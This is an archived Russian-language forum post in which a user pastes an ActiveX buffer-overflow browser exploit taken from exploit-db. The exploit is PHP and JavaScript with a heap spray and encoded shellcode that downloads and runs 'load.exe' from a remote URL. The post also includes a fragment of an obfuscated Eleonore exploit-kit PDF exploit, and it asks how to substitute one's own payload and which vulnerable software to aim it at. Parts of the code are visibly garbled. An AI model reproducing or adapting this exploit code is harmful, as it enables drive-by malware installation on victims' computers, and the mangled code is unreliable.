PDA

Просмотр полной версии : ActiveX Remote BOF Exploit


GibridMelody
15.10.2011, 22:23
Нашёл на exploit-db сплойт:


// 0x48k-ymj by ...

// based on /5043

// Bug discovered by Krystian Kloskowski (h07)





functionunescape($s){

$res=strtoupper(bin2hex($s));

$g=round(strlen($res)/4);

if ($g!= (strlen($res)/4))$res.="00";

$out="";

for ($i=0;$i









function gsc(){

var hsta = 0x0c 0c0c0c;

var plc = unesc ape("%u4343%u4343"+

"%u0feb%u335b%u66c9%u80b9%u8001%uef33"+

"%ue243%uebfa%ue805%uffec%uffff%u8b7f"+

"%udf4e%uefef%u64ef%ue3af%u9f64%u42f3"+

"%u9f64%u6ee7%uef03%uefeb%u64ef%ub903"+

"%u6187%ue1a1%u0703%uef11%uefef%uaa66"+

"%ub9eb%u7787%u6511%u07e1%uef1f%uefef"+

"%uaa66%ub9e7%uca87%u105f%u072d%uef0d"+

"%uefef%uaa66%ub9e3%u0087%u0f21%u078f"+

"%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"+

"%u0757%uef29%uefef%uaa66%uaffb%ud76f"+

"%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef"+

"%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba"+

"%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0"+

"%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c"+

"%u66bf%ucfaa%u1087%uefef%ubfef%uaa64"+

"%u85fb%ub6ed%uba64%u07f7%uef8e%uefef"+

"%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"+

"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85"+

"%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8"+

"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+

"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+

"%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+

"%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+

"%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+

"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+

"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+

"%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+

"%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+

"%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+

"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+

"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+

"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+

"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+

"%u1011%uba10%ua3bd%ua0a2%uefa1"+

"'.unescape("http://site.come/load.exe").'");

var hbs=0x400000;

var pls=plc.lengt h*2;

var sss=hbs-(pls+0x38);

var ss=unescape("%u0c0c%u0c0c");

ss=gss(ss,sss);

hbs=(hsta-0x400000)/hbs;

for(i=0;i





';



?>

Я хотел спросить у вас вы лучше меня знаете я уверен...


varplc=unescape("%u4343%u4343"+

"%u0feb%u335b%u66c9%u80b9%u8001%uef33"+

"%ue243%uebfa%ue805%uffec%uffff%u8b7f"+

"%udf4e%uefef%u64ef%ue3af%u9f64%u42f3"+

"%u9f64%u6ee7%uef03%uefeb%u64ef%ub903"+

"%u6187%ue1a1%u0703%uef11%uefef%uaa66"+

"%ub9eb%u7787%u6511%u07e1%uef1f%uefef"+

"%uaa66%ub9e7%uca87%u105f%u072d%uef0d"+

"%uefef%uaa66%ub9e3%u0087%u0f21%u078f"+

"%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"+

"%u0757%uef29%uefef%uaa66%uaffb%ud76f"+

"%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef"+

"%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba"+

"%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0"+

"%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c"+

"%u66bf%ucfaa%u1087%uefef%ubfef%uaa64"+

"%u85fb%ub6ed%uba64%u07f7%uef8e%uefef"+

"%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"+

"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85"+

"%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8"+

"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+

"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+

"%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+

"%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+

"%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+

"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+

"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+

"%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+

"%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+

"%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+

"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+

"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+

"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+

"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+

"%u1011%uba10%ua3bd%ua0a2%uefa1"+

"'.unescape("http://site.com/load.exe").'");

Это шел код который устонавливает load.exe в систему с сайта site. Тоесть я его залью укажу свой файл и запущу с уязвимым плагином или что там и он будет работать??

Вот ещё хотел спросить под что он чтоб я опробывать смог... Взял отсюда http://www.exploit-db.com/exploits/5046/

Тоесть что мне поставить подо что он??

Вот ещё сплойт:

Взял из элеонорки


= 9){

try {if (app.doc.Collab.getIcon){'.$rnd_ array[5].'(2);var '.$rnd_array[17].' = unescape("%09");

while ('.$rnd_array[17].'.length = 7.1&& '.$rnd_array[15].' > 4);

chr2 = ((enc2 & 15) > 2);

chr3 = ((enc3 & 3)

Спасибо.